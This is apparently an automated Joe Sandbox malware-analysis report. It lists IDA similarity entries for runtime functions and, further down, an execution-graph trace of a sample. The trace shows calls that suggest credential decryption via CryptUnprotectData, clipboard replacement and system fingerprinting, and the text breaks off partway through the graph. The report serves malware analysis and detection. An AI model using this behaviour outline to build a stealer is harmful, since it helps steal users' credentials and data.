                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                  • String ID: api-ms-
                                                                                  • API String ID: 3177248105-2084034818
                                                                                  • Opcode ID: 313052f82e40ab785fde7cb02eb9868b8dde2eb94cec083c591f0d80754283f1
                                                                                  • Instruction ID: 79bf23bfe60ed8f2a1f334db341ca59a36e4d89bdcdbd3d1a913ded214b01bef
                                                                                  • Opcode Fuzzy Hash: 313052f82e40ab785fde7cb02eb9868b8dde2eb94cec083c591f0d80754283f1
                                                                                  • Instruction Fuzzy Hash: 34E01230284305B7DF212B60ED06B993B5B9B51B81F104021F90DA45E1EBE2F8108A54
                                                                                  APIs
                                                                                  • GetConsoleOutputCP.KERNEL32(81500716,00000000,00000000,?), ref: 00693122
                                                                                    • Part of subcall function 0068AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0068C6C1,?,00000000,-00000008), ref: 0068AED2
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00693374
                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006933BA
                                                                                  • GetLastError.KERNEL32 ref: 0069345D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                  • String ID:
                                                                                  • API String ID: 2112829910-0
                                                                                  • Opcode ID: 930dd2db39bcab689d8605659325e65a5a54ac395494acf15cdde31af055e599
                                                                                  • Instruction ID: 91c527e9fab745a50c4147cd898217c51afd109dac9c03508e2e51edfd3f3829
                                                                                  • Opcode Fuzzy Hash: 930dd2db39bcab689d8605659325e65a5a54ac395494acf15cdde31af055e599
                                                                                  • Instruction Fuzzy Hash: 6DD16775D042589FCF15CFE8C8849EDBBBAFF09714F28416AE426EB751D630AA02CB50
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdjustPointer
                                                                                  • String ID:
                                                                                  • API String ID: 1740715915-0
                                                                                  • Opcode ID: ef41436ac5dd198126776240e79ff04c8b48cf023115f56ffdaf4050e4ee3b92
                                                                                  • Instruction ID: b8279b6cb704e5154cbec7becebd174d9d8ff27de1f026420d801b3a7a5fb062
                                                                                  • Opcode Fuzzy Hash: ef41436ac5dd198126776240e79ff04c8b48cf023115f56ffdaf4050e4ee3b92
                                                                                  • Instruction Fuzzy Hash: E251DE726016029FFB25BF90D855BBA77A6FF04310F18432EEC4647291E732AE81CB52
                                                                                  APIs
                                                                                    • Part of subcall function 0068AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0068C6C1,?,00000000,-00000008), ref: 0068AED2
                                                                                  • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00690BEA
                                                                                  • __dosmaperr.LIBCMT ref: 00690BF1
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00690C2B
                                                                                  • __dosmaperr.LIBCMT ref: 00690C32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1913693674-0
                                                                                  • Opcode ID: 6d0d10c211246e846339fb5c43d37089e2fec8bea89752b9266aedacc0920b9c
                                                                                  • Instruction ID: c10682da5872958ff763c45ee79845291e055afcd8a24f678868368f3490e710
                                                                                  • Opcode Fuzzy Hash: 6d0d10c211246e846339fb5c43d37089e2fec8bea89752b9266aedacc0920b9c
                                                                                  • Instruction Fuzzy Hash: 8521DE71600215FFAF60AF61C8819ABB7AFFF00368B10862CF959D7A11DB31EC508B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8faa770becfcceb8206e9d94d564b5e3f120b16aa9f45e22d98ded3c1e197418
                                                                                  • Instruction ID: 9413e83aa689c49972feb0537088dd97edf4f8088380fd87ce8c147de29e780c
                                                                                  • Opcode Fuzzy Hash: 8faa770becfcceb8206e9d94d564b5e3f120b16aa9f45e22d98ded3c1e197418
                                                                                  • Instruction Fuzzy Hash: 5D21A171200205AF9B20BF61CC91DAA77AFBF423647144B2CF959CF251EB31EC5287A4
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00691F84
                                                                                    • Part of subcall function 0068AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0068C6C1,?,00000000,-00000008), ref: 0068AED2
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00691FBC
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00691FDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 158306478-0
                                                                                  • Opcode ID: 221925108b931f23178a88faead23cb524dd7e30588dda817cab09d4266292f6
                                                                                  • Instruction ID: 835abacce9666ea7ea19267a8c18aa61ea66dad0d0b05c8e0933465a17cfeba3
                                                                                  • Opcode Fuzzy Hash: 221925108b931f23178a88faead23cb524dd7e30588dda817cab09d4266292f6
                                                                                  • Instruction Fuzzy Hash: 7F11E5B250050ABEBB213BF15C89CAF696FCE8A3997100119F901D2602FF709D01D6B5
                                                                                  APIs
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00672A8D
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00672A9B
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00672AB4
                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00672AF3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                  • String ID:
                                                                                  • API String ID: 2261580123-0
                                                                                  • Opcode ID: 2813614b6800338ed58cb91138350e3f7b1f01c39c8736a2f6165ed07ebac61e
                                                                                  • Instruction ID: ac1d7512b63053903d9fcd5156014c636dd31bd79a6adecf14af9686e835f89c
                                                                                  • Opcode Fuzzy Hash: 2813614b6800338ed58cb91138350e3f7b1f01c39c8736a2f6165ed07ebac61e
                                                                                  • Instruction Fuzzy Hash: 9D21B3B4E0420A8FCB58EFA8C5956AEBBF2EF48300F01845DE459AB351D7789940CF55
                                                                                  APIs
                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000), ref: 0069A487
                                                                                  • GetLastError.KERNEL32(?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000,?,?,?,00692DF7,?), ref: 0069A493
                                                                                    • Part of subcall function 0069A4E4: CloseHandle.KERNEL32(FFFFFFFE,0069A4A3,?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000,?,?), ref: 0069A4F4
                                                                                  • ___initconout.LIBCMT ref: 0069A4A3
                                                                                    • Part of subcall function 0069A4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0069A461,0069993F,?,?,006934B1,?,00000000,00000000,?), ref: 0069A4D8
                                                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00699952,00000000,00000001,?,?,?,006934B1,?,00000000,00000000,?), ref: 0069A4B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                  • String ID:
                                                                                  • API String ID: 2744216297-0
                                                                                  • Opcode ID: 195cfc72e948d822a67b272de43b55460c10ac82bfe29b06bd7478a618f1d147
                                                                                  • Instruction ID: fedd7b42e56578b61224a6c742ecfaed4d39a0a813bb4af475049c2d204350e1
                                                                                  • Opcode Fuzzy Hash: 195cfc72e948d822a67b272de43b55460c10ac82bfe29b06bd7478a618f1d147
                                                                                  • Instruction Fuzzy Hash: 73F01C36140615BBCF223FD1DC08AD93FABFB8A7A0F114410FA1D85520DA729920AFE5
                                                                                  APIs
                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0067EFB9
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0067EFC8
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 0067EFD1
                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 0067EFDE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                  • String ID:
                                                                                  • API String ID: 2933794660-0
                                                                                  • Opcode ID: 2e1bb5f6e1f3b0669b275e5d106a8c03225e1deb1e55770a1c868e44a009e1f0
                                                                                  • Instruction ID: 7c820e8aef68c50e1677b92553817cf0acfd2d93a6a6dcf95ada45ca7de8a2d9
                                                                                  • Opcode Fuzzy Hash: 2e1bb5f6e1f3b0669b275e5d106a8c03225e1deb1e55770a1c868e44a009e1f0
                                                                                  • Instruction Fuzzy Hash: E7F0B270C0020CEBCB00EFF4CA4898EBBF4EF5D200BA15996A412E7154EB70AB44CF50
                                                                                  APIs
                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0068A6E1,?,?,00000000,00000000,00000000,?), ref: 0068A805
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: EncodePointer
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 2118026453-2084237596
                                                                                  • Opcode ID: 3da68204e8d53134161170a216a1323b1ed672229fcbf5236e7cbb7800abd641
                                                                                  • Instruction ID: 1016494cf24ad048d7ad40bf3075514191f121f06af4090354d8cf31a5378c6a
                                                                                  • Opcode Fuzzy Hash: 3da68204e8d53134161170a216a1323b1ed672229fcbf5236e7cbb7800abd641
                                                                                  • Instruction Fuzzy Hash: 9F418B71900209AFDF16EF94CC81AEEBBB6FF08300F1982AAF90467221D3359951DF65
                                                                                  APIs
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0068A2C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 3493665558-3733052814
                                                                                  • Opcode ID: 86e5a73b4b464e0be270cc27504c8d443697e004304d6e85d341602b0687a831
                                                                                  • Instruction ID: 261ed36d33c724ae20194ca0dd8909656455967eff9ae23622e5a7053d1c68af
                                                                                  • Opcode Fuzzy Hash: 86e5a73b4b464e0be270cc27504c8d443697e004304d6e85d341602b0687a831
                                                                                  • Instruction Fuzzy Hash: E331AF32400218DBEF26AF94C8409AE7B67FF09715B18875BFC4489221C336D8A2DB92
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674B2B
                                                                                    • Part of subcall function 0067BE78: _Yarn.LIBCPMT ref: 0067BE98
                                                                                    • Part of subcall function 0067BE78: _Yarn.LIBCPMT ref: 0067BEBC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Yarn$LockitLockit::_std::_
                                                                                  • String ID: ^Ig$bad locale name
                                                                                  • API String ID: 360232963-1188953556
                                                                                  • Opcode ID: fc427fd012ce731cc1fb697fd8d31c6cbe6fe231dbc91d3b304eecf5e2111920
                                                                                  • Instruction ID: f5f541d50dc4dd153d1a811e88ae8c633f1eac761763520790d352c0af5a6d63
                                                                                  • Opcode Fuzzy Hash: fc427fd012ce731cc1fb697fd8d31c6cbe6fe231dbc91d3b304eecf5e2111920
                                                                                  • Instruction Fuzzy Hash: 4B01D670905108DBDB48FFA9D495BAD7BB2AF44308F04846CE64A57342DF30AA90CB9A

                                                                                  Execution Graph

                                                                                  Execution Coverage:5.3%
                                                                                  Dynamic/Decrypted Code Coverage:6.9%
                                                                                  Signature Coverage:29.7%
                                                                                  Total number of Nodes:232
                                                                                  Total number of Limit Nodes:19
                                                                                  execution_graph 33158 43dd42 33160 43dd70 33158->33160 33159 43ddee 33160->33159 33162 43da10 LdrInitializeThunk 33160->33162 33162->33159 33163 43de41 33164 43de60 33163->33164 33164->33164 33167 43da10 LdrInitializeThunk 33164->33167 33166 43e37f 33167->33166 33173 417745 33174 417750 33173->33174 33175 4178d0 CryptUnprotectData 33174->33175 33176 4178fa 33175->33176 33176->33176 33292 436885 33295 4368ac 33292->33295 33293 4368ed 33295->33293 33296 43da10 LdrInitializeThunk 33295->33296 33296->33295 33177 38a1000 33178 38a1102 33177->33178 33179 38a1012 33177->33179 33180 38a103a OpenClipboard 33179->33180 33181 38a1030 Sleep 33179->33181 33182 38a104a GetClipboardData 33180->33182 33183 38a10f9 GetClipboardSequenceNumber 33180->33183 33181->33179 33184 38a105a GlobalLock 33182->33184 33185 38a10f3 CloseClipboard 33182->33185 33183->33179 33184->33185 33186 38a106b GlobalAlloc 33184->33186 33185->33183 33188 38a10e9 GlobalUnlock 33186->33188 33189 38a109d GlobalLock 33186->33189 33188->33185 33190 38a10b0 33189->33190 33191 38a10b9 GlobalUnlock 33190->33191 33192 38a10cb EmptyClipboard SetClipboardData 33191->33192 33193 38a10e0 GlobalFree 33191->33193 33192->33188 33192->33193 33193->33188 33297 42c98c 33298 42c9b0 33297->33298 33298->33298 33299 42cda4 GetPhysicallyInstalledSystemMemory 33298->33299 33300 42cde0 33299->33300 33300->33300 33194 42d0cd 33195 42d100 33194->33195 33195->33195 33196 42d208 33195->33196 33198 43da10 LdrInitializeThunk 33195->33198 33198->33196 33199 4230d3 33200 4230dd 33199->33200 33206 440dc0 33200->33206 33202 423367 33203 423351 GetLogicalDrives 33204 440dc0 LdrInitializeThunk 33203->33204 33204->33202 33205 4231d1 33205->33202 33205->33203 33205->33205 33207 440de0 33206->33207 33207->33207 33208 440f1e 33207->33208 33210 43da10 LdrInitializeThunk 33207->33210 33208->33205 33210->33208 33301 426090 33302 4260c0 33301->33302 33303 42614e 33302->33303 33311 43da10 LdrInitializeThunk 33302->33311 33304 426270 33303->33304 33306 43bd20 RtlAllocateHeap 33303->33306 33308 4261be 33306->33308 33307 43bd40 RtlFreeHeap 33307->33304 33310 42626e 33308->33310 33312 43da10 LdrInitializeThunk 33308->33312 33310->33307 33310->33310 33311->33303 33312->33310 33313 43d990 33314 43d9d5 33313->33314 33315 43d9ca 33313->33315 33316 43d9a8 33313->33316 33318 43d9d0 33313->33318 33319 43d9b6 33313->33319 33323 43d9e1 33313->33323 33321 43bd40 RtlFreeHeap 33314->33321 33320 43bd20 RtlAllocateHeap 33315->33320 33316->33314 33316->33318 33316->33319 33316->33323 33317 43bd40 RtlFreeHeap 33317->33318 33322 43d9bb RtlReAllocateHeap 33319->33322 33320->33318 33321->33323 33322->33318 33323->33317 33211 40cad6 CoInitializeEx CoInitializeEx 33324 432919 33327 414290 33324->33327 33326 43291e CoSetProxyBlanket 33327->33326 33328 40d11b 33329 40d130 33328->33329 33332 4387d0 33329->33332 33331 40d24a 33333 438800 CoCreateInstance 33332->33333 33335 438a70 SysAllocString 33333->33335 33336 438fbb 33333->33336 33339 438afa 33335->33339 33337 438fcb GetVolumeInformationW 33336->33337 33347 438fe6 33337->33347 33340 438b02 CoSetProxyBlanket 33339->33340 33341 438fa8 SysFreeString 33339->33341 33342 438b22 SysAllocString 33340->33342 33343 438f9e 33340->33343 33341->33336 33345 438c30 33342->33345 33343->33341 33345->33345 33346 438c46 SysAllocString 33345->33346 33349 438c6e 33346->33349 33347->33331 33348 438f89 SysFreeString SysFreeString 33348->33343 33349->33348 33350 438f7f 33349->33350 33351 438cb9 VariantInit 33349->33351 33350->33348 33352 438d10 33351->33352 33352->33352 33353 438f6e VariantClear 33352->33353 33353->33350 33354 40e11e 33357 411bc0 33354->33357 33356 40e124 33366 411bd9 33357->33366 33358 411be0 33358->33356 33359 412276 RtlExpandEnvironmentStrings 33359->33366 33360 41389f CreateThread 33360->33366 33361 4125bc RtlExpandEnvironmentStrings 33361->33366 33362 43bd40 RtlFreeHeap 33362->33366 33365 43da10 LdrInitializeThunk 33365->33366 33366->33358 33366->33359 33366->33360 33366->33361 33366->33362 33366->33365 33367 440aa0 LdrInitializeThunk 33366->33367 33368 441190 LdrInitializeThunk 33366->33368 33367->33366 33368->33366 33212 420760 33213 4207c0 33212->33213 33214 42076e 33212->33214 33218 420880 33214->33218 33216 42083c 33216->33213 33217 41e990 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 33216->33217 33217->33213 33219 420890 33218->33219 33219->33219 33220 440dc0 LdrInitializeThunk 33219->33220 33221 4209cf 33220->33221 33369 43e9a1 GetForegroundWindow 33373 43fda0 33369->33373 33371 43e9b0 GetForegroundWindow 33372 43e9c2 33371->33372 33374 43fdb0 33373->33374 33374->33371 33375 4336a0 33376 4336ce GetSystemMetrics GetSystemMetrics 33375->33376 33377 433711 33376->33377 33222 40cc67 CoInitializeSecurity 33223 42e1ee CoSetProxyBlanket 33383 41052c 33384 410546 33383->33384 33385 4107ff RtlExpandEnvironmentStrings 33384->33385 33388 40ead5 33384->33388 33386 410876 33385->33386 33387 4108e0 RtlExpandEnvironmentStrings 33386->33387 33386->33388 33387->33388 33390 41095e 33387->33390 33391 414ea0 33390->33391 33392 414ec0 33391->33392 33392->33392 33405 440c30 33392->33405 33394 415083 33395 4150a5 33394->33395 33399 415256 33394->33399 33400 4152d2 33394->33400 33404 4150e2 33394->33404 33415 440f70 LdrInitializeThunk 33394->33415 33395->33399 33395->33400 33395->33404 33409 441030 33395->33409 33399->33404 33416 43da10 LdrInitializeThunk 33399->33416 33403 440c30 LdrInitializeThunk 33400->33403 33402 4154ca 33403->33404 33404->33388 33404->33404 33406 440c50 33405->33406 33407 440d6e 33406->33407 33417 43da10 LdrInitializeThunk 33406->33417 33407->33394 33410 441060 33409->33410 33413 4410ae 33410->33413 33418 43da10 LdrInitializeThunk 33410->33418 33412 4150d3 33412->33399 33412->33400 33412->33404 33413->33412 33419 43da10 LdrInitializeThunk 33413->33419 33415->33395 33416->33402 33417->33407 33418->33413 33419->33412 33420 43dbac 33421 43dbc0 33420->33421 33422 43dc3e 33421->33422 33427 43da10 LdrInitializeThunk 33421->33427 33426 43da10 LdrInitializeThunk 33422->33426 33425 43e21d 33426->33425 33427->33422 33428 42bf32 33429 42bf3e GetComputerNameExA 33428->33429 33431 4085b0 33433 4085bc 33431->33433 33432 4086d9 ExitProcess 33433->33432 33434 4085d1 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 33433->33434 33435 4086c2 33433->33435 33437 408600 33434->33437 33436 4086cb 33435->33436 33446 43d970 FreeLibrary 33436->33446 33437->33437 33439 43bd20 RtlAllocateHeap 33437->33439 33440 408638 GetForegroundWindow 33439->33440 33442 4086b1 33440->33442 33442->33435 33443 4086bd 33442->33443 33445 40b550 FreeLibrary FreeLibrary 33443->33445 33445->33435 33446->33432 33224 43bd70 33225 43bd90 33224->33225 33226 43be0e 33225->33226 33234 43da10 